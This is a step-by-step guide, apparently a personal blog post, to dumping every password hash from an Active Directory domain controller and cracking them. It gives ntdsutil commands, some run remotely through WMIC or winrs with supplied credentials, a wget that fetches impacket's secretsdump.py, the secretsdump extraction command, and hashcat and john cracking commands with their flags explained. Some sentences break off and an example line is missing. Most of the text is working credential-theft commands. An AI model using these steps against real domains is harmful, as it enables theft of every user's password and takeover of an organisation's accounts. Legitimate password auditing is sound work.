These are the steps I use to get a dump of all password hashes from a domain controller and then crack the hashes with
john. Excluding the dumping of password hashes, these steps are all executed on a Linux host. If you are trying to do this completely from Windows you will need to adapt the commands to suite.
Dumping Password Hashes
First a dump of the active directory data needs to be taken so the list of password hashes can be extracted. There are multiple methods that can be used to do this, I have listed a few here for convenience:
ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q
'ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q' Wmic /node:COMPUTER /user:DOMAIN\USERNAME /password:PASSWORD process call create $command
$command = 'ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q' winrs –r:COMPUTER $command
Once the command has been executed you will need to get the
c:\temp\ntdsdump directory and copy it over to the device doing the password cracking. Make sure to delete the directory on the domain controller after it has been copied.
python3 -m pip install impacket
Change to the directory containing the dump created from the previous step and get the
cd ~/Temp/ntdsdump wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py
Dump the password hashes into a file (they will be dumped into the file specified with the
-outputfile flag with the
.ntds extension added,
ntlm_hashes.ntds in this case):
python3 secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm_hashes
I don’t want to bother trying to crack passwords for computer objects, so I will filter those out:
grep -v '$:' ntlm_hashes.ntds > ntlm_hashes_filtered
Once done take a look at
ntlm_hashes_filtered to make sure it has a list of the hashes as expected; it should have lines that look like this:
Now the cracking can begin.
Personally for cracking passwords I prefer to use hashcat, but you can use either one. A convenient location to download word lists from is Weakpass.
Both hashcat and john have extensive flags that can be used; the manual should be checked for both before running anything.
To crack passwords without using any rules with hashcat:
hashcat -a 0 -m 1000 -w 3 -O -o cracked ntlm_hashes_filtered WORDLIST.txt
To use rules (the path to rules may vary depending on the Linux distribution, this is assuming Ubuntu):
hashcat -a 0 -m 1000 -w 3 -O -o cracked -r /usr/share/hashcat/rules/d3ad0ne.rule ntlm_hashes_filtered WORDLIST.txt
The important flags for the commands above are:
-a 0: Set the attack mode to “Straight”
-m 1000: Set the hash mode to “NTLM”
-w 3: Set the word load profile to “High”
-O: Enable optimized kernels
-o cracked: Set the output filename for recovered hashes to “cracked”
-r <path to rule>: Use the specified rule
There should be other rules available, so you can experiment with different options to see what works best for your situation.
During the crack or after the crack session has completed you can retrieve the list of credentials with the –show flag:
hashcat -m 1000 --show --username ntlm_hashes_filtered
To use john to crack passwords (in this case it would be using my CPU instead of GPU):
john --session=ntlm_hashes --wordlist=WORDLIST.txt --fork=8 --format=nt --pot=ntlm.pot ntlm_hashes_filtered
As with hashcat, john is able to use various rules with the
john --session=ntlm_hashes --wordlist=WORDLIST.txt --rules=Jumbo --fork=8 --format=nt --pot=ntlm.pot ntlm_hashes_filtered